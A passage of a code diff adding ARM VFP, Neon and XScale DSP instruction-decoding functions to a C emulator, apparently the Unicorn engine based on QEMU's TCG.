tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + return 1; + } + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_op_iwmmxt_movq_wRn_M0(s, wrd); + gen_op_iwmmxt_set_mup(s); + break; + default: + return 1; + } + + return 0; +} + +/* Disassemble an XScale DSP instruction. Returns nonzero if an error occurred + (ie. an undefined instruction). */ +static int disas_dsp_insn(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int acc, rd0, rd1, rdhi, rdlo; + TCGv_i32 tmp, tmp2; + + if ((insn & 0x0ff00f10) == 0x0e200010) { + /* Multiply with Internal Accumulate Format */ + rd0 = (insn >> 12) & 0xf; + rd1 = insn & 0xf; + acc = (insn >> 5) & 7; + + if (acc != 0) + return 1; + + tmp = load_reg(s, rd0); + tmp2 = load_reg(s, rd1); + switch ((insn >> 16) & 0xf) { + case 0x0: /* MIA */ + gen_helper_iwmmxt_muladdsl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); + break; + case 0x8: /* MIAPH */ + gen_helper_iwmmxt_muladdsw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); + break; + case 0xc: /* MIABB */ + case 0xd: /* MIABT */ + case 0xe: /* MIATB */ + case 0xf: /* MIATT */ + if (insn & (1 << 16)) + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); + if (insn & (1 << 17)) + tcg_gen_shri_i32(tcg_ctx, tmp2, tmp2, 16); + gen_helper_iwmmxt_muladdswl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2); + break; + default: + return 1; + } + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp); + + gen_op_iwmmxt_movq_wRn_M0(s, acc); + return 0; + } + + if ((insn & 0x0fe00ff8) == 0x0c400000) { + /* Internal Accumulator Access Format */ + rdhi = (insn >> 16) & 0xf; + rdlo = (insn >> 12) & 0xf; + acc = insn & 7; + + if (acc != 0) + return 1; + + if (insn & ARM_CP_RW_BIT) { /* MRA */ + iwmmxt_load_reg(s, tcg_ctx->cpu_V0, acc); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_V0); + tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_V0); + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_R[rdhi], (1 << (40 - 32)) - 1); + } else { /* MAR */ + tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_R[rdhi]); + iwmmxt_store_reg(s, tcg_ctx->cpu_V0, acc); + } + return 0; + } + + return 1; +} + +// this causes "warning C4293: shift count negative or too big, undefined behavior" +// on msvc, so is replaced with separate versions for the shift to perform. +//#define VFP_REG_SHR(x, n) (((n) > 0) ? (x) >> (n) : (x) << -(n)) +#if 0 +#define VFP_SREG(insn, bigbit, smallbit) \ + ((VFP_REG_SHR(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1)) +#endif + +#define VFP_REG_SHR_NEG(insn, n) ((insn) << -(n)) +#define VFP_SREG_NEG(insn, bigbit, smallbit) \ + ((VFP_REG_SHR_NEG(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1)) + +#define VFP_REG_SHR_POS(x, n) ((insn) >> (n)) +#define VFP_SREG_POS(insn, bigbit, smallbit) \ + ((VFP_REG_SHR_POS(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1)) + +#define VFP_DREG(reg, insn, bigbit, smallbit) do { \ + if (arm_dc_feature(s, ARM_FEATURE_VFP3)) { \ + reg = (((insn) >> (bigbit)) & 0x0f) \ + | (((insn) >> ((smallbit) - 4)) & 0x10); \ + } else { \ + if (insn & (1 << (smallbit))) \ + return 1; \ + reg = ((insn) >> (bigbit)) & 0x0f; \ + }} while (0) + +#define VFP_SREG_D(insn) VFP_SREG_POS(insn, 12, 22) +#define VFP_DREG_D(reg, insn) VFP_DREG(reg, insn, 12, 22) +#define VFP_SREG_N(insn) VFP_SREG_POS(insn, 16, 7) +#define VFP_DREG_N(reg, insn) VFP_DREG(reg, insn, 16, 7) +#define VFP_SREG_M(insn) VFP_SREG_NEG(insn, 0, 5) +#define VFP_DREG_M(reg, insn) VFP_DREG(reg, insn, 0, 5) + +/* Move between integer and VFP cores. */ +static TCGv_i32 gen_vfp_mrs(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp, tcg_ctx->cpu_F0s); + return tmp; +} + +static void gen_vfp_msr(DisasContext *s, TCGv_i32 tmp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_F0s, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static void gen_neon_dup_u8(DisasContext *s, TCGv_i32 var, int shift) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + if (shift) + tcg_gen_shri_i32(tcg_ctx, var, var, shift); + tcg_gen_ext8u_i32(tcg_ctx, var, var); + tcg_gen_shli_i32(tcg_ctx, tmp, var, 8); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_gen_shli_i32(tcg_ctx, tmp, var, 16); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static void gen_neon_dup_low16(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ext16u_i32(tcg_ctx, var, var); + tcg_gen_shli_i32(tcg_ctx, tmp, var, 16); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static void gen_neon_dup_high16(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, var, var, 0xffff0000); + tcg_gen_shri_i32(tcg_ctx, tmp, var, 16); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static TCGv_i32 gen_load_and_replicate(DisasContext *s, TCGv_i32 addr, int size) +{ + /* Load a single Neon element and replicate into a 32 bit TCG reg */ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + switch (size) { + case 0: + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + gen_neon_dup_u8(s, tmp, 0); + break; + case 1: + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + gen_neon_dup_low16(s, tmp); + break; + case 2: + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + break; + default: /* Avoid compiler warnings. */ + abort(); + } + return tmp; +} + +static int handle_vsel(DisasContext *s, uint32_t insn, uint32_t rd, uint32_t rn, uint32_t rm, + uint32_t dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t cc = extract32(insn, 20, 2); + + if (dp) { + TCGv_i64 frn, frm, dest; + TCGv_i64 tmp, zero, zf, nf, vf; + + zero = tcg_const_i64(tcg_ctx, 0); + + frn = tcg_temp_new_i64(tcg_ctx); + frm = tcg_temp_new_i64(tcg_ctx); + dest = tcg_temp_new_i64(tcg_ctx); + + zf = tcg_temp_new_i64(tcg_ctx); + nf = tcg_temp_new_i64(tcg_ctx); + vf = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_extu_i32_i64(tcg_ctx, zf, tcg_ctx->cpu_ZF); + tcg_gen_ext_i32_i64(tcg_ctx, nf, tcg_ctx->cpu_NF); + tcg_gen_ext_i32_i64(tcg_ctx, vf, tcg_ctx->cpu_VF); + + tcg_gen_ld_f64(tcg_ctx, frn, tcg_ctx->cpu_env, vfp_reg_offset(dp, rn)); + tcg_gen_ld_f64(tcg_ctx, frm, tcg_ctx->cpu_env, vfp_reg_offset(dp, rm)); + switch (cc) { + case 0: /* eq: Z */ + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, dest, zf, zero, + frn, frm); + break; + case 1: /* vs: V */ + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, dest, vf, zero, + frn, frm); + break; + case 2: /* ge: N == V -> N ^ V == 0 */ + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_xor_i64(tcg_ctx, tmp, vf, nf); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, dest, tmp, zero, + frn, frm); + tcg_temp_free_i64(tcg_ctx, tmp); + break; + case 3: /* gt: !Z && N == V */ + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, dest, zf, zero, + frn, frm); + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_xor_i64(tcg_ctx, tmp, vf, nf); + tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, dest, tmp, zero, + dest, frm); + tcg_temp_free_i64(tcg_ctx, tmp); + break; + } + tcg_gen_st_f64(tcg_ctx, dest, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i64(tcg_ctx, frn); + tcg_temp_free_i64(tcg_ctx, frm); + tcg_temp_free_i64(tcg_ctx, dest); + + tcg_temp_free_i64(tcg_ctx, zf); + tcg_temp_free_i64(tcg_ctx, nf); + tcg_temp_free_i64(tcg_ctx, vf); + + tcg_temp_free_i64(tcg_ctx, zero); + } else { + TCGv_i32 frn, frm, dest; + TCGv_i32 tmp, zero; + + zero = tcg_const_i32(tcg_ctx, 0); + + frn = tcg_temp_new_i32(tcg_ctx); + frm = tcg_temp_new_i32(tcg_ctx); + dest = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f32(tcg_ctx, frn, tcg_ctx->cpu_env, vfp_reg_offset(dp, rn)); + tcg_gen_ld_f32(tcg_ctx, frm, tcg_ctx->cpu_env, vfp_reg_offset(dp, rm)); + switch (cc) { + case 0: /* eq: Z */ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, dest, tcg_ctx->cpu_ZF, zero, + frn, frm); + break; + case 1: /* vs: V */ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, dest, tcg_ctx->cpu_VF, zero, + frn, frm); + break; + case 2: /* ge: N == V -> N ^ V == 0 */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GE, dest, tmp, zero, + frn, frm); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + case 3: /* gt: !Z && N == V */ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, dest, tcg_ctx->cpu_ZF, zero, + frn, frm); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GE, dest, tmp, zero, + dest, frm); + tcg_temp_free_i32(tcg_ctx, tmp); + break; + } + tcg_gen_st_f32(tcg_ctx, dest, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i32(tcg_ctx, frn); + tcg_temp_free_i32(tcg_ctx, frm); + tcg_temp_free_i32(tcg_ctx, dest); + + tcg_temp_free_i32(tcg_ctx, zero); + } + + return 0; +} + +static int handle_vminmaxnm(DisasContext *s, uint32_t insn, uint32_t rd, uint32_t rn, + uint32_t rm, uint32_t dp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t vmin = extract32(insn, 6, 1); + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + + if (dp) { + TCGv_i64 frn, frm, dest; + + frn = tcg_temp_new_i64(tcg_ctx); + frm = tcg_temp_new_i64(tcg_ctx); + dest = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_ld_f64(tcg_ctx, frn, tcg_ctx->cpu_env, vfp_reg_offset(dp, rn)); + tcg_gen_ld_f64(tcg_ctx, frm, tcg_ctx->cpu_env, vfp_reg_offset(dp, rm)); + if (vmin) { + gen_helper_vfp_minnumd(tcg_ctx, dest, frn, frm, fpst); + } else { + gen_helper_vfp_maxnumd(tcg_ctx, dest, frn, frm, fpst); + } + tcg_gen_st_f64(tcg_ctx, dest, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i64(tcg_ctx, frn); + tcg_temp_free_i64(tcg_ctx, frm); + tcg_temp_free_i64(tcg_ctx, dest); + } else { + TCGv_i32 frn, frm, dest; + + frn = tcg_temp_new_i32(tcg_ctx); + frm = tcg_temp_new_i32(tcg_ctx); + dest = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_ld_f32(tcg_ctx, frn, tcg_ctx->cpu_env, vfp_reg_offset(dp, rn)); + tcg_gen_ld_f32(tcg_ctx, frm, tcg_ctx->cpu_env, vfp_reg_offset(dp, rm)); + if (vmin) { + gen_helper_vfp_minnums(tcg_ctx, dest, frn, frm, fpst); + } else { + gen_helper_vfp_maxnums(tcg_ctx, dest, frn, frm, fpst); + } + tcg_gen_st_f32(tcg_ctx, dest, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i32(tcg_ctx, frn); + tcg_temp_free_i32(tcg_ctx, frm); + tcg_temp_free_i32(tcg_ctx, dest); + } + + tcg_temp_free_ptr(tcg_ctx, fpst); + return 0; +} + +static int handle_vrint(DisasContext *s, uint32_t insn, uint32_t rd, uint32_t rm, uint32_t dp, + int rounding) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + TCGv_i32 tcg_rmode; + + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rounding)); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + + if (dp) { + TCGv_i64 tcg_op; + TCGv_i64 tcg_res; + tcg_op = tcg_temp_new_i64(tcg_ctx); + tcg_res = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ld_f64(tcg_ctx, tcg_op, tcg_ctx->cpu_env, vfp_reg_offset(dp, rm)); + gen_helper_rintd(tcg_ctx, tcg_res, tcg_op, fpst); + tcg_gen_st_f64(tcg_ctx, tcg_res, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i64(tcg_ctx, tcg_op); + tcg_temp_free_i64(tcg_ctx, tcg_res); + } else { + TCGv_i32 tcg_op; + TCGv_i32 tcg_res; + tcg_op = tcg_temp_new_i32(tcg_ctx); + tcg_res = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f32(tcg_ctx, tcg_op, tcg_ctx->cpu_env, vfp_reg_offset(dp, rm)); + gen_helper_rints(tcg_ctx, tcg_res, tcg_op, fpst); + tcg_gen_st_f32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, vfp_reg_offset(dp, rd)); + tcg_temp_free_i32(tcg_ctx, tcg_op); + tcg_temp_free_i32(tcg_ctx, tcg_res); + } + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + + tcg_temp_free_ptr(tcg_ctx, fpst); + return 0; +} + +static int handle_vcvt(DisasContext *s, uint32_t insn, uint32_t rd, uint32_t rm, uint32_t dp, + int rounding) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + bool is_signed = extract32(insn, 7, 1); + TCGv_ptr fpst = get_fpstatus_ptr(s, 0); + TCGv_i32 tcg_rmode, tcg_shift; + + tcg_shift = tcg_const_i32(tcg_ctx, 0); + + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rounding)); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + + if (dp) { + TCGv_i64 tcg_double, tcg_res; + TCGv_i32 tcg_tmp; + /* Rd is encoded as a single precision register even when the source + * is double precision. + */ + rd = ((rd << 1) & 0x1e) | ((rd >> 4) & 0x1); + tcg_double = tcg_temp_new_i64(tcg_ctx); + tcg_res = tcg_temp_new_i64(tcg_ctx); + tcg_tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f64(tcg_ctx, tcg_double, tcg_ctx->cpu_env, vfp_reg_offset(1, rm)); + if (is_signed) { + gen_helper_vfp_tosld(tcg_ctx, tcg_res, tcg_double, tcg_shift, fpst); + } else { + gen_helper_vfp_tould(tcg_ctx, tcg_res, tcg_double, tcg_shift, fpst); + } + tcg_gen_trunc_i64_i32(tcg_ctx, tcg_tmp, tcg_res); + tcg_gen_st_f32(tcg_ctx, tcg_tmp, tcg_ctx->cpu_env, vfp_reg_offset(0, rd)); + tcg_temp_free_i32(tcg_ctx, tcg_tmp); + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_double); + } else { + TCGv_i32 tcg_single, tcg_res; + tcg_single = tcg_temp_new_i32(tcg_ctx); + tcg_res = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_f32(tcg_ctx, tcg_single, tcg_ctx->cpu_env, vfp_reg_offset(0, rm)); + if (is_signed) { + gen_helper_vfp_tosls(tcg_ctx, tcg_res, tcg_single, tcg_shift, fpst); + } else { + gen_helper_vfp_touls(tcg_ctx, tcg_res, tcg_single, tcg_shift, fpst); + } + tcg_gen_st_f32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, vfp_reg_offset(0, rd)); + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_single); + } + + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_rmode); + + tcg_temp_free_i32(tcg_ctx, tcg_shift); + + tcg_temp_free_ptr(tcg_ctx, fpst); + + return 0; +} + +/* Table for converting the most common AArch32 encoding of + * rounding mode to arm_fprounding order (which matches the + * common AArch64 order); see ARM ARM pseudocode FPDecodeRM(). + */ +static const uint8_t fp_decode_rm[] = { + FPROUNDING_TIEAWAY, + FPROUNDING_TIEEVEN, + FPROUNDING_POSINF, + FPROUNDING_NEGINF, +}; + +static int disas_vfp_v8_insn(DisasContext *s, uint32_t insn) +{ + uint32_t rd, rn, rm, dp = extract32(insn, 8, 1); + + if (!arm_dc_feature(s, ARM_FEATURE_V8)) { + return 1; + } + + if (dp) { + VFP_DREG_D(rd, insn); + VFP_DREG_N(rn, insn); + VFP_DREG_M(rm, insn); + } else { + rd = VFP_SREG_D(insn); + rn = VFP_SREG_N(insn); + rm = VFP_SREG_M(insn); + } + + if ((insn & 0x0f800e50) == 0x0e000a00) { + return handle_vsel(s, insn, rd, rn, rm, dp); + } else if ((insn & 0x0fb00e10) == 0x0e800a00) { + return handle_vminmaxnm(s, insn, rd, rn, rm, dp); + } else if ((insn & 0x0fbc0ed0) == 0x0eb80a40) { + /* VRINTA, VRINTN, VRINTP, VRINTM */ + int rounding = fp_decode_rm[extract32(insn, 16, 2)]; + return handle_vrint(s, insn, rd, rm, dp, rounding); + } else if ((insn & 0x0fbc0e50) == 0x0ebc0a40) { + /* VCVTA, VCVTN, VCVTP, VCVTM */ + int rounding = fp_decode_rm[extract32(insn, 16, 2)]; + return handle_vcvt(s, insn, rd, rm, dp, rounding); + } + return 1; +} + +/* Disassemble a VFP instruction. Returns nonzero if an error occurred + (ie. an undefined instruction). */ +static int disas_vfp_insn(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t rd, rn, rm, op, i, n, offset, delta_d, delta_m, bank_mask; + int dp, veclen; + TCGv_i32 addr; + TCGv_i32 tmp; + TCGv_i32 tmp2; + + if (!arm_dc_feature(s, ARM_FEATURE_VFP)) { + return 1; + } + + /* FIXME: this access check should not take precedence over UNDEF + * for invalid encodings; we will generate incorrect syndrome information + * for attempts to execute invalid vfp/neon encodings with FP disabled. + */ + if (!s->cpacr_fpen) { + gen_exception_insn(s, 4, EXCP_UDEF, + syn_fp_access_trap(1, 0xe, s->thumb)); + return 0; + } + + if (!s->vfp_enabled) { + /* VFP disabled. Only allow fmxr/fmrx to/from some control regs. */ + if ((insn & 0x0fe00fff) != 0x0ee00a10) + return 1; + rn = (insn >> 16) & 0xf; + if (rn != ARM_VFP_FPSID && rn != ARM_VFP_FPEXC && rn != ARM_VFP_MVFR2 + && rn != ARM_VFP_MVFR1 && rn != ARM_VFP_MVFR0) { + return 1; + } + } + + if (extract32(insn, 28, 4) == 0xf) { + /* Encodings with T=1 (Thumb) or unconditional (ARM): + * only used in v8 and above. + */ + return disas_vfp_v8_insn(s, insn); + } + + dp = ((insn & 0xf00) == 0xb00); + switch ((insn >> 24) & 0xf) { + case 0xe: + if (insn & (1 << 4)) { + /* single register transfer */ + rd = (insn >> 12) & 0xf; + if (dp) { + int size; + int pass; + + VFP_DREG_N(rn, insn); + if (insn & 0xf) + return 1; + if (insn & 0x00c00060 + && !arm_dc_feature(s, ARM_FEATURE_NEON)) { + return 1; + } + + pass = (insn >> 21) & 1; + if (insn & (1 << 22)) { + size = 0; + offset = ((insn >> 5) & 3) * 8; + } else if (insn & (1 << 5)) { + size = 1; + offset = (insn & (1 << 6)) ? 16 : 0; + } else { + size = 2; + offset = 0; + } + if (insn & ARM_CP_RW_BIT) { + /* vfp->arm */ + tmp = neon_load_reg(tcg_ctx, rn, pass); + switch (size) { + case 0: + if (offset) + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, offset); + if (insn & (1 << 23)) + gen_uxtb(tmp); + else + gen_sxtb(tmp); + break; + case 1: + if (insn & (1 << 23)) { + if (offset) { + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); + } else { + gen_uxth(tmp); + } + } else { + if (offset) { + tcg_gen_sari_i32(tcg_ctx, tmp, tmp, 16); + } else { + gen_sxth(tmp); + } + } + break; + case 2: + break; + } + store_reg(s, rd, tmp); + } else { + /* arm->vfp */ + tmp = load_reg(s, rd); + if (insn & (1 << 23)) { + /* VDUP */ + if (size == 0) { + gen_neon_dup_u8(s, tmp, 0); + } else if (size == 1) { + gen_neon_dup_low16(s, tmp); + } + for (n = 0; n <= pass * 2; n++) { + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp2, tmp); + neon_store_reg(tcg_ctx, rn, n, tmp2); + } + neon_store_reg(tcg_ctx, rn, n, tmp); + } else { + /* VMOV */ + switch (size) { + case 0: + tmp2 = neon_load_reg(tcg_ctx, rn, pass); + tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, offset, 8); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case 1: + tmp2 = neon_load_reg(tcg_ctx, rn, pass); + tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, offset, 16); + tcg_temp_free_i32(tcg_ctx, tmp2); + break; + case 2: + break; + } + neon_store_reg(tcg_ctx, rn, pass, tmp); + } + } + } else { /* !dp */ + if ((insn & 0x6f) != 0x00) + return 1; + rn = VFP_SREG_N(insn); + if (insn & ARM_CP_RW_BIT) { + /* vfp->arm */ + if (insn & (1 << 21)) { + /* system register */ + rn >>= 1; + + switch (rn) { + case ARM_VFP_FPSID: + /* VFP2 allows access to FSID from userspace. + VFP3 restricts all id registers to privileged + accesses. */ + if (IS_USER(s) + && arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + tmp = load_cpu_field(s->uc, vfp.xregs[rn]); + break; + case ARM_VFP_FPEXC: + if (IS_USER(s)) + return 1; + tmp = load_cpu_field(s->uc, vfp.xregs[rn]); + break; + case ARM_VFP_FPINST: + case ARM_VFP_FPINST2: + /* Not present in VFP3. */ + if (IS_USER(s) + || arm_dc_feature(s, ARM_FEATURE_VFP3)) { + return 1; + } + tmp = load_cpu_field(s->uc, vfp.xregs[rn]); + break; + case ARM_VFP_FPSCR: + if (rd == 15) { + tmp = load_cpu_field(s->uc, vfp.xregs[ARM_VFP_FPSCR]); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xf0000000); + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + gen_helper_vfp_get_fpscr(tcg_ctx, tmp, tcg_ctx->cpu_env); + } + break; + case ARM_VFP_MVFR2: + if (!arm_dc_feature(s, ARM_FEATURE_V8)) { + return 1; + } + /* fall through */ + case ARM_VFP_MVFR0: + case ARM_VFP_MVFR1: + if (IS_USER(s) + || !arm_dc_feature(s, ARM_FEATURE_MVFR)) { + return 1; + } + tmp = load_cpu_field(s->uc, vfp.xregs[rn]); + break; + default: + return 1; + } + } else { + gen_mov_F0_vreg(s, 0, rn); + tmp = gen_vfp_mrs(s); + } + if (rd == 15) { + /* Set the 4 flag bits in the CPSR. */ + gen_set_nzcv(s, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + store_reg(s, rd, tmp); + } + } else { + /* arm->vfp */ + if (insn & (1 << 21)) { + rn >>= 1; + /* system register */ + switch (rn) { + case ARM_VFP_FPSID: + case ARM_VFP_MVFR0: + case ARM_VFP_MVFR1: + /* Writes are ignored. */ + break; + case ARM_VFP_FPSCR: + tmp = load_reg(s, rd); + gen_helper_vfp_set_fpscr(tcg_ctx, tcg_ctx->cpu_env, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + gen_lookup_tb(s); + break; + case ARM_VFP_FPEXC: + if (IS_USER(s)) + return 1; + /* TODO: VFP subarchitecture support. + * For now, keep the EN bit only */ + tmp = load_reg(s, rd); + tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 1 << 30); + store_cpu_field(tcg_ctx, tmp, vfp.xregs[rn]); + gen_lookup_tb(s); + break; + case ARM_VFP_FPINST: + case ARM_VFP_FPINST2: + if (IS_USER(s)) { + return 1; + } + tmp = load_reg(s, rd); + store_cpu_field(tcg_ctx, tmp, vfp.xregs[rn]); + break; + default: + return 1; + } + } else { + tmp = load_reg(s, rd); + gen_vfp_msr(s, tmp); + gen_mov_vreg_F0(s, 0, rn); + } + } + } + } else { + /* data processing */ + /* The opcode is in bits 23, 21, 20 and 6. */ + op = ((insn >> 20) & 8) | ((insn >> 19) & 6) | ((insn >> 6) & 1); + if (dp) { + if (op == 15) { + /* rn is opcode */ + rn = ((insn >> 15) & 0x1e) | ((insn >> 7) & 1); + } else { + /* rn is register number */ + VFP_DREG_N(rn, insn); + } + + if (op == 15 && (rn == 15 || ((rn & 0x1c) == 0x18) || + ((rn & 0x1e) == 0x6))) { + /* Integer or single/half precision destination. */ + rd = VFP_SREG_D(insn); + } else { + VFP_DREG_D(rd, insn); + } + if (op == 15 && + (((rn & 0x1c) == 0x10) || ((rn & 0x14) == 0x14) || + ((rn & 0x1e) == 0x4))) { + /* VCVT from int or half precision is always from S reg + * regardless of dp bit. VCVT with immediate frac_bits + * has same format as SREG_M. + */ + rm = VFP_SREG_M(insn); + } else { + VFP_DREG_M(rm, insn); + } + } else { + rn = VFP_SREG_N(insn); + if (op == 15 && rn == 15) { + /* Double precision destination. */ + VFP_DREG_D(rd, insn); + } else { + rd = VFP_SREG_D(insn); + } + /* NB that we implicitly rely on the encoding for the frac_bits + * in VCVT of fixed to float being the same as that of an SREG_M + */ + rm = VFP_SREG_M(insn); + } + + veclen = s->vec_len; + if (op == 15 && rn > 3) + veclen = 0; + + /* Shut up compiler warnings. */ + delta_m = 0; + delta_d = 0; + bank_mask = 0; + + if (veclen > 0) { + if (dp) + bank_mask = 0xc; + else + bank_mask = 0x18; + + /* Figure out what type of vector operation this is. */ + if ((rd & bank_mask) == 0) { + /* scalar */ + veclen = 0; + } else { + if (dp) + delta_d = (s->vec_stride >> 1) + 1; + else + delta_d = s->vec_stride + 1; + + if ((rm & bank_mask) == 0) { + /* mixed scalar/vector */ + delta_m = 0; + } else { + /* vector */ + delta_m = delta_d; + } + } + } + + /* Load the initial operands. */ + if (op == 15) { + switch (rn) { + case 16: + case 17: + /* Integer source */ + gen_mov_F0_vreg(s, 0, rm); + break; + case 8: + case 9: + /* Compare */ + gen_mov_F0_vreg(s, dp, rd); + gen_mov_F1_vreg(s, dp, rm); + break; + case 10: + case 11: + /* Compare with zero */ + gen_mov_F0_vreg(s, dp, rd); + gen_vfp_F1_ld0(s, dp); + break; + case 20: + case 21: + case 22: + case 23: + case 28: + case 29: + case 30: + case 31: + /* Source and destination the same. */ + gen_mov_F0_vreg(s, dp, rd); + break; + case 4: + case 5: + case 6: + case 7: + /* VCVTB, VCVTT: only present with the halfprec extension + * UNPREDICTABLE if bit 8 is set prior to ARMv8 + * (we choose to UNDEF) + */ + if ((dp && !arm_dc_feature(s, ARM_FEATURE_V8)) || + !arm_dc_feature(s, ARM_FEATURE_VFP_FP16)) { + return 1; + } + if (!extract32(rn, 1, 1)) { + /* Half precision source. */ + gen_mov_F0_vreg(s, 0, rm); + break; + } + /* Otherwise fall through */ + default: + /* One source operand. */ + gen_mov_F0_vreg(s, dp, rm); + break; + } + } else { + /* Two source operands. */ + gen_mov_F0_vreg(s, dp, rn); + 